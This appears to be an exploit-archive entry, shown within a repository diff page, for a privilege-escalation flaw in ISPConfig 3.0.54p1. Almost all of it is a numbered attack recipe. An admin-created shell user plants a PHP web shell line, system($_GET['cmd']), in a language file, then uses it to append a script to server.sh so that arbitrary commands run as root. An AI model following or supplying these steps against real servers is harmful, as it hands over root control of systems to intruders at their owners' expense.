4e7ab00187
204 changes to exploits/shellcodes Charity Management System CMS 1.0 - Multiple Vulnerabilities
25 lines
No EOL
635 B
Text
25 lines
No EOL
635 B
Text
# Exploit Title: ISPConfig 3 authenticated admin Localroot vulnerability
|
|
# Date: 7/25/14
|
|
# Exploit Author: mra
|
|
# Vendor Homepage: http://wwwispconfig.org
|
|
# Version: 3.0.54p1
|
|
# Tested on: ubuntu, centos
|
|
# irc.criten.net #elite-chat
|
|
|
|
|
|
While logged in as admin user:
|
|
|
|
|
|
1) add a shell user
|
|
|
|
2) under option set gid to ispconfig
|
|
|
|
3) log in as that user
|
|
|
|
4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
|
|
|
|
|
|
5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh
|
|
|
|
|
|
6) create /tmp/script and put a command you wish to be executed as root. |